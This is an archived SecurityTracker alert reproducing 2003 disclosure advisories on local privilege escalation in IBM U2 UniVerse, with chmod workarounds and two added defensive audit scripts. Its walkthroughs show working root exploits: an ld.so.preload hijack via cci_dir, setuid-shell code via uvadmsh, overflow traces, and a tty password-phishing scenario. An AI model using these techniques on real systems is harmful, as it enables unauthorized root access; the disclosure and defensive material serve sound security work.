SecurityTracker.com
SecurityTracker
Archives


 


Category:   Application (Database)  >   UniVerse
Vendors:   IBM
IBM U2 UniVerse Database Flaws in 'cci_dir' and 'uvadmsh' Let Local Users Obtain Root Privileges
SecurityTracker Alert ID:  1007208
SecurityTracker URL:  http://securitytracker.com/id/1007208
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jul 16 2003
Impact:   Execution of arbitrary code via local system, Modification of authentication information, Modification of system information, Root access via local system
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 10.0.0.9 and prior versions
Description:   Several vulnerabilities were reported in IBM's U2 UniVerse database. A local user can obtain root privileges due to flaws in the cci_dir and uvadmsh utilities.

Secure Network Operations Strategic Reconnaissance Team reported several vulnerabilities.

One vulnerability was reported in the 'cci_dir' legacy application. The application reportedly makes a link() function call and an unlink() function call with set user id (setuid) root user privileges. A local user can write arbitrary text to arbitrary files on the system with the following steps: using the unlink() call to effectively delete an arbitrary file on the system, creating arbitrary code in a new file, and then using the link() call to create a hard link from the newly created file to the deleted file.

It is reported that a local user with 'uvadm' user privileges can gain root privileges by exploiting the '/usr/ibm/uv/bin/uvadmsh' utility. This user account is optional, according to the advisory. The utility reportedly can be made to execute arbitrary binaries with root privileges.

A local user with 'uvadm' user privileges can also gain root privileges by exploiting a buffer overflow in the uvadmsh binary. A local user can provide a specially crafted command line argument to trigger the overflow and execute arbitrary code with root privileges.

It is reported that the '/usr/ibm/uv/bin/uvrestore' and '/usr/ibm/uv/bin/setacc' applications may exhibit "odd behavior." A local user reportedly may be able to cause these setuid root applications to core dump or change permissions on device files.

Impact:   A local user can write arbitrary text to arbitrary files with root permissions to gain root privileges.

A local user with 'uvadm' privileges can gain root privileges.

Solution:   The vendor reportedly plans to issue a fix in a future release. IBM reportedly plans to remove the 'cci_dir' application in future releases.

The advisory indicates that the following commands can be used as a workaround:

chmod -s /usr/ibm/uv/bin/cci_dir

chmod -s /usr/ibm/uv/bin/uvadmsh
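
An added audit script (not from the advisory or from IBM) that covers the workaround above and the device-permission symptom noted in the description: it lists the setuid bits on the binaries this alert names, applies the chmod -s workaround, and flags tty devices whose mode has gained setuid, setgid or world-write bits. The bin directory is passed as an argument, and checking both setacc and uvsetacc is an assumption, since the advisory writes the first name but its trace shows the second.

```shell
#!/bin/sh
# Added example, not part of the advisory or of IBM's software.
# Audits a UniVerse bin directory (the advisory's install path is
# /usr/ibm/uv/bin) for the setuid binaries this alert names, applies the
# chmod -s workaround, and flags terminal devices whose mode has gained
# setuid/setgid or world-write bits (uvsetacc was traced doing chmod 04775).

# Binaries named in the alert. The advisory writes "setacc" in its workaround
# but traces "uvsetacc", so both names are checked (assumption).
UV_SUID_TARGETS="cci_dir uvadmsh uvrestore setacc uvsetacc"

# Print an ls -l line for each target that still carries setuid or setgid.
# Returns 0 when nothing is flagged, 1 otherwise.
uv_suid_audit() {
    dir=$1
    found=0
    for name in $UV_SUID_TARGETS; do
        path="$dir/$name"
        [ -e "$path" ] || continue        # not every install ships every binary
        if [ -u "$path" ] || [ -g "$path" ]; then
            ls -ld "$path"
            found=1
        fi
    done
    return $found
}

# Apply the advisory's workaround to every target present, then re-audit.
# Note from the advisory: once uvadmsh is no longer setuid, its functions
# have to be run as root.
uv_apply_workaround() {
    dir=$1
    for name in $UV_SUID_TARGETS; do
        path="$dir/$name"
        if [ -e "$path" ]; then
            chmod -s "$path"
        fi
    done
    uv_suid_audit "$dir" >/dev/null
}

# Print each entry of a tty directory (e.g. /dev/pts) whose mode has setuid,
# setgid or other-write set. A pty normally shows crw--w---- (0620); ptmx is
# legitimately 0666 and is skipped. Returns 1 if anything is flagged.
tty_mode_audit() {
    dir=$1
    bad=$(find "$dir"/* -prune ! -name ptmx \
          \( -perm -4000 -o -perm -2000 -o -perm -0002 \) -print 2>/dev/null || true)
    [ -z "$bad" ] && return 0
    printf '%s\n' "$bad"
    return 1
}

# Usage: sh uv_audit.sh /usr/ibm/uv/bin   (nothing runs when no directory is given)
if [ $# -gt 0 ]; then
    uv_suid_audit "$1"
    tty_mode_audit /dev/pts
fi
```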

Vendor URL:  ibm.com/software/data/u2/universe/
Cause:   Access control error, Boundary error, State error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (DGUX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (SGI/IRIX), UNIX (Solaris - SunOS), UNIX (Tru64)
Underlying OS Comments:  Confirmed on Linux

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] SRT2003-07-07-0831 - IBM U2 UniVerse cci_dir creates hard links as



Thanks to IBM for being so receptive with these issues.

For those of you that have requested we revive the old "Snosoft" 
advisories we have begun placing our legacy advisories at 
http://www.secnetops.biz as time permits.
-KF




Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-X-XXXX
Product                 : IBM U2 UniVerse
Version                 : Version <= 10.0.0.9 (DGUX = 7.3.2.1) 
Vendor                  : http://ibm.com/software/data/u2/universe/
Class                   : local
Criticality             : High (to UniVerse servers with local users) 
Operating System(s)     : DGUX, Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description  : cci_dir creates hard links as root. 
What to do              : chmod -s /usr/ibm/uv/bin/cci_dir


Technical Details
************************************************************************
Proof Of Concept Status : No PoC needed for this issue. 
Low Level Description   : 

UniVerse is an extended relational database designed for embedding in 
vertical applications. Its nested relational data model results in 
intuitive data modeling and fewer resulting tables. UniVerse provides 
data access, storage and management capabilities across Microsoft®
Windows® NT, Linux and UNIX platforms.

A legacy program apparently left over from UniVerse's support for the CCI 
(Concurrent Controls Inc) Operating System can provide a normal user 
with root access. cci_dir makes a call to link() while running as root.
This can allow an attacker to place text into any file that does not yet
exist. cci_dir will also call unlink() on the attacker's file of choice,
again while running as root. The combination of these issues can provide
root in a number of ways. The only limitation on the exploitation of 
this issue would be the use of multiple partitions. As H D Moore of 
http://digitaldefense.net pointed out to me, linking across partitions 
will result in a failure in the link() call. 

link("/etc/passwd", "/tmp/test") = -1 EXDEV (Invalid cross-device link)

The above limitation by no means stops potential exploitation of this 
issue. Some of the attacker's options include placing "+ +" in a .rhosts
file, unlinking and recreating the shadow or password files, or even the
trojaning of shared library files. 

The results of this issue are demonstrated below.

[root@vegeta bin]# ls -al ./cci_dir
-rwsr-x--x    1 root     bin         10328 Apr  3 21:57 ./cci_dir

[root@vegeta bin]# ltrace ./cci_dir USER_SUPPLIED USER_SUPPLIED2
...
link("USER_SUPPLIED", "USER_SUPPLIED2")        = -1
fprintf(0x4212ef80, "Was unable to link files\n") = 25

[root@vegeta bin]# touch a
[root@vegeta bin]# ltrace ./cci_dir a b
...
link("a", "b")                                 = 0
unlink("a")                                    = 0

Let's see how the above can lead to a root compromise. 

My first target would be /etc/ld.so.preload. We cannot link to a file 
that already exists, so let's have it unlink()'d for us. 

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
-rw-r--r--    1 root     root         0 Jul  7 20:03 /etc/ld.so.preload

[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir /etc/ld.so.preload isgone
Was unable to unlink file isgone/..

[kf@vegeta kf]$ ls -al isgone
-rw-r--r--    1 root     root            0 Jul  7 20:03 isgone

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory

Next let's prepare for a shared library attack on /etc/ld.so.preload.
[kf@vegeta kf]$ cat > oops.c
int getuid(void)
{
return(0);
}
^C

[kf@vegeta kf]$ gcc -c -o oops.o oops.c
[kf@vegeta kf]$ ld -shared -o oops.so oops.o
[kf@vegeta kf]$ cat > owned
/home/kf/oops.so
^C

Next we cause cci_dir to hardlink to our trojan ld.so.preload file.
[kf@vegeta kf]$ /usr/ibm/uv/bin/cci_dir owned /etc/ld.so.preload
Was unable to unlink file /etc/ld.so.preload/..

You should note that we now have an ld.so.preload file.

[kf@vegeta kf]$ ls -al /etc/ld.so.preload
-rw-rw-r--    1 kf       kf         18 Jun 27 18:41 /etc/ld.so.preload

[kf@vegeta kf]$ cat /etc/ld.so.preload
/home/kf/oops.so

Now you can simply take root. (note you do NOT type a password for su)

[kf@vegeta kf]$ su -
[root@vegeta root]# id
uid=0(root) gid=0(root) groups=0(root)


Patch or Workaround     : chmod -s /usr/ibm/uv/bin/cci_dir

Vendor Status           : The IBM U2 staff will have this issue resolved 
in a future release of IBM U2. Patches may also be supplied on a per 
client basis at IBM's discretion. 

Research and testing by the IBM staff has confirmed that cci_dir is no longer 
required for current UniVerse platform support. It will be removed from future 
UniVerse releases. Customers may also remove it from their systems to mitigate 
this vulnerability.

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations, Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
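
The advisory's demonstration turns /etc/ld.so.preload into the root vector, so the defender's counterpart is a check on that file. The script below is an added example, not part of the advisory; it takes the file path and the expected owner uid as arguments (an assumption made so it can also be run against a constructed file).

```shell
#!/bin/sh
# Added example, not part of the advisory. Checks an ld.so.preload file the
# way a defender would after reading the cci_dir write-up: the file itself
# must be owned by the expected uid (root) and not writable by group/other,
# and every library it lists must exist, be owned by that uid, not be
# group/other writable and live under a system library directory.

# Directory prefixes an ld.so.preload entry is expected to live under.
PRELOAD_OK_PREFIXES="/lib /lib64 /usr/lib /usr/lib64"

# Numeric owner uid of a path (ls -n avoids depending on stat(1) output).
owner_of() {
    ls -ldn "$1" | awk '{print $3}'
}

# True when the ls -l mode string shows a group-write or other-write bit.
group_or_other_writable() {
    case $(ls -ld "$1" | cut -c1-10) in
        ?????w*|????????w?) return 0 ;;
    esac
    return 1
}

# Print one finding per line for FILE (default /etc/ld.so.preload), expecting
# it and its entries to be owned by uid OWNER (default 0, root). Returns 0
# when there are no findings, 1 otherwise. An absent file is the normal state.
check_preload() {
    file=${1:-/etc/ld.so.preload}
    owner=${2:-0}
    [ -e "$file" ] || return 0
    rc=0
    if [ "$(owner_of "$file")" != "$owner" ]; then
        echo "$file: owned by uid $(owner_of "$file"), expected $owner"; rc=1
    fi
    if group_or_other_writable "$file"; then
        echo "$file: writable by group or other"; rc=1
    fi
    # ld.so reads the file as a whitespace-separated list of shared objects.
    for lib in $(cat "$file"); do
        ok=0
        for p in $PRELOAD_OK_PREFIXES; do
            case $lib in "$p"/*) ok=1 ;; esac
        done
        [ $ok -eq 1 ] || { echo "$file: entry $lib is outside system library dirs"; rc=1; }
        if [ ! -e "$lib" ]; then
            echo "$file: entry $lib does not exist"; rc=1
            continue
        fi
        [ "$(owner_of "$lib")" = "$owner" ] || { echo "$file: entry $lib not owned by uid $owner"; rc=1; }
        if group_or_other_writable "$lib"; then
            echo "$file: entry $lib is writable by group or other"; rc=1
        fi
    done
    return $rc
}

# Usage: sh preload_check.sh [/etc/ld.so.preload [owner-uid]]
if [ $# -gt 0 ]; then
    check_preload "$@"
fi
```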





Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-07-0913
Product                 : IBM U2 UniVerse
Version                 : Version <= 10.0.0.9 ?
Vendor                  : http://ibm.com/software/data/u2/universe/
Class                   : local
Criticality             : Low  
Operating System(s)     : Only confirmed on Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description  : Abnormal suid behavior in several applications
What to do              : chmod -s /usr/ibm/uv/bin/uvrestore
                          chmod -s /usr/ibm/uv/bin/setacc


Technical Details
************************************************************************
Proof Of Concept Status : No PoC necessary
Low Level Description   : 


Several binaries have odd behavior, including core dumps and 
changing permissions on device files. 

The intent of the below gdb and strace dumps is only to show why we 
feel these issues are difficult to exploit on Linux. We do not feel 
that we are disclosing Intellectual Property in any way. No anti-debug 
routines are enforced by the below applications. The point is 
to show what calls are causing the problem. The result could vary on 
a different Unix platform or processor. 

uvrestore suffers from a command line overflow:

(gdb) r `perl -e 'print "A" x 6000'`
Starting program: uvrestore `perl -e 'print "A" x 6000'`
Program received signal SIGSEGV, Segmentation fault.
0x0805e81a in basename ()
(gdb) bt
#0  0x0805e81a in basename ()
#1  0x080619b3 in basename ()
#2  0x42015574 in libc_start_main () from /lib/tls/libc.so.6
(gdb) i r
eax            0x41414141       1094795585

...
[0805e6ec] strcmp("AAAAAAAAAAAAAAAAAAAAAAAAA"..., "-noindexfix") = 1
[0805e771] strcmp("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "-") = 1
[0805e7f3] strcpy(0x083b7d00, "AAAAAAAAAAAAAAAAAAA"...) = 0x083b7d00
[0805e815] strcpy(0x083b9100, "AAAAAAAAAAAAAAAAAAA"...) = 0x083b9100
[0805e81a] --- SIGSEGV (Segmentation fault) --- 

uvsetacc does a chmod based on ttyname() results: 

[root@vegeta bin]# ltrace ./uvsetacc 2557
ttyname(1)                                     = "/dev/pts/1"
chmod("/dev/pts/1", 04775)                     = 0

[kf@vegeta kf]$ ls -al /dev/pts/1
crw-------    1 kf       tty      136,   1 Jul  7 21:40 /dev/pts/1
[kf@vegeta kf]$ /usr/ibm/uv/bin/uvsetacc 2557
[kf@vegeta kf]$ ls -al /dev/pts/1
crwsrwxr-x    1 kf       tty      136,   1 Jul  7 21:41 /dev/pts/1

--- farfetched - disgruntled helpdesk worker attack scenario ---

Helpdesk phone *ring*...
uvadm-> hello
boss-> my universe program xyz is acting weird

uvadm finds boss's tty. *grin*
kf       pts/1    -                 9:42pm  1:02   0.16s  0.16s  /bin/bash

[uvadm@vegeta uvadm]$ id
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)
[uvadm@vegeta uvadm]$ cat /dev/pts/1
cat: /dev/pts/1: Permission denied

uvadm-> hrmm try typing this and let's see what happens... 
"/usr/ibm/uv/bin/uvsetacc 2559"
boss-> ok I typed it... now what? 
uvadm-> do you see the password prompt?

[uvadm@vegeta uvadm]$ ls -al /dev/pts/1
crwsrwxrwx    1 kf       tty      136,   1 Jul  7 21:48 /dev/pts/1
[uvadm@vegeta uvadm]$ echo Enter Your Universe Password: >> /dev/pts/1

boss-> oh yeah hold on let me type the password in. 
...

In order to exploit the uvsetacc behavior, you must be logged in as user 
uvadm. The creation and use of the Unix user 'uvadm' is optional for 
UniVerse. It is not required for the successful installation, configuration 
and administration of UniVerse. The intended use of uvadm is to allow a 
selected, specific non-root user to perform all aspects of UniVerse 
administration.

Patch or Workaround     : chmod -s /usr/ibm/uv/bin/uvrestore
                          chmod -s /usr/ibm/uv/bin/setacc

Vendor Status           : The IBM U2 staff will have this issue resolved 
in a future release of IBM U2. Patches may also be supplied on a per 
client basis at IBM's discretion. 

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.



--------------060402050905090702010000--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



This is a multi-part message in MIME format.
--------------000804060106040403020807
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Thanks to IBM for being so receptive with these issues.

For those of you that have requested we revive the old "Snosoft" 
advisories we have begun placing our legacy advisories at 
http://www.secnetops.biz as time permits.
-KF

--------------000804060106040403020807
Content-Type: text/plain;
 name="SRT2003-07-07-0833.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="SRT2003-07-07-0833.txt"

Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-07-0833
Product                 : IBM U2 UniVerse
Version                 : Version <= 10.0.0.9 ?
Vendor                  : http://ibm.com/software/data/u2/universe/
Class                   : local
Criticality             : High (to UniVerse servers with local users) 
Operating System(s)     : Only confirmed on Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description  : users with uvadm rights can take root
What to do              : chmod -s /usr/ibm/uv/bin/uvadmsh


Technical Details
************************************************************************
Proof Of Concept Status : SNO Does have PoC code for this issue. 
Low Level Description   : 


The creation and use of the Unix user 'uvadm' is optional for UniVerse. 
It is not required for the successful installation, configuration and
administration of UniVerse. The intended use of uvadm is to allow a
selected, specific non-root user to perform all aspects of UniVerse
administration.

The uvadmsh program checks the user's name against the string "uvadm",
which means in order to exploit this issue you need to have access to
the user uvadm. 

[kf@vegeta kf]$ ltrace /tmp/uvadmsh -uv.install /tmp
...
strcmp("kf", "uvadm")                                        = -1

[uvadm@vegeta uvadm]$ id
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)

You will note that with the proper uid the binary begins looking for 
the command line option "-uv.install" which is the path to a binary
file to execute.

[uvadm@vegeta uvadm]$ ltrace /tmp/uvadmsh -uv.install /tmp
...
strcmp("uvadm", "uvadm")                                     = 0
strcmp("-uv.install", "-uv.install")                         = 0

This condition is fairly easy to take advantage of as you can see here. 

[uvadm@vegeta uvadm]$ cat > /tmp/uv.install.c
main()
{
setuid(0);
system("cc -o /tmp/owned /tmp/owned.c");
system("chmod 4755 /tmp/owned");
}

[uvadm@vegeta uvadm]$ cc -o /tmp/uv.install /tmp/uv.install.c
[uvadm@vegeta uvadm]$ cat > /tmp/owned.c
main()
{
setuid(0);
system("/bin/bash");
}

[uvadm@vegeta uvadm]$ ls -al /tmp/owned
ls: /tmp/owned: No such file or directory

[uvadm@vegeta uvadm]$ /usr/ibm/uv/bin/uvadmsh -uv.install /tmp
[uvadm@vegeta uvadm]$ ls -al /tmp/owned
-rwsr-xr-x    1 root     uvadm       11640 Jul  2 20:15 /tmp/owned

[uvadm@vegeta uvadm]$ /tmp/owned
[root@vegeta uvadm]# id
uid=0(root) gid=503(uvadm) groups=503(uvadm)

Patch or Workaround     : chmod -s /usr/ibm/uv/bin/uvadmsh

Note: If you decide to 'chmod -s uvadmsh', you will need to be a root user
to perform all of the uvadmsh functions.

Vendor Status           : The IBM U2 staff will have this issue resolved 
in a future release of IBM U2. Patches may also be supplied on a per 
client basis at IBM's discretion. 

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.



--------------000804060106040403020807--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html



This is a multi-part message in MIME format.
--------------020000080506030904030700
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Thanks to IBM for being so receptive with these issues.

For those of you that have requested we revive the old "Snosoft" 
advisories we have begun placing our legacy advisories at 
http://www.secnetops.biz as time permits.
-KF

--------------020000080506030904030700
Content-Type: text/plain;
 name="SRT2003-07-08-1223.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: inline;
 filename="SRT2003-07-08-1223.txt"

Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research@secnetops.com
Team Lead Contact                                 kf@secnetops.com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-07-08-1223
Product                 : IBM U2 UniVerse
Version                 : Version <= 10.0.0.9 ?
Vendor                  : http://ibm.com/software/data/u2/universe/
Class                   : local
Criticality             : High (to UniVerse servers with local users)
Operating System(s)     : Only confirmed on Linux (other unix based?)


High Level Explanation
************************************************************************
High Level Description  : uvadm can take root via buffer overflows
What to do              : chmod -s /usr/ibm/uv/bin/uvadmsh


Technical Details
************************************************************************
Proof Of Concept Status : SNO does have PoC code
Low Level Description   : 


The uvadm user may exploit a buffer overflow in the uvadmsh binary to 
take root. There is a buffer overflow when processing command line
arguments. Please note that without the -uv.install argument this issue 
is NOT exploitable; however, the overflow still occurs. 

(gdb) r -uv.install `perl -e 'print "Z" x 546'`
Starting program: uvadmsh -uv.install `perl -e 'print "Z" x 546'`
error

Program received signal SIGSEGV, Segmentation fault.
0x5a5a5a5a in ?? ()
(gdb) bt
#0  0x5a5a5a5a in ?? ()
Cannot access memory at address 0x5a5a5a5a

You must have uvadm rights in order to exploit this issue. The 
creation and use of the Unix user 'uvadm' is optional for UniVerse. 
It is not required for the successful installation, configuration and
administration of UniVerse. The intended use of uvadm is to allow a
selected, specific non-root user to perform all aspects of UniVerse
administration.

[uvadm@vegeta tmp]$ id
uid=503(uvadm) gid=503(uvadm) groups=503(uvadm)
[uvadm@vegeta tmp]$ ./uvadm_root.pl
error
sh-2.05b# id
uid=0(root) gid=503(uvadm) groups=503(uvadm)

Patch or Workaround     : chmod -s /usr/ibm/uv/bin/uvadmsh

Note: If you decide to 'chmod -s uvadmsh', you will need to be a root 
user to perform all of the uvadmsh functions.

Vendor Status           : The IBM U2 staff will have this issue resolved 
in a future release of IBM U2. Patches may also be supplied on a per 
client basis at IBM's discretion. 

Bugtraq URL             : to be assigned

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research@secnetops.com for information on how
to obtain exploit information.



--------------020000080506030904030700--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC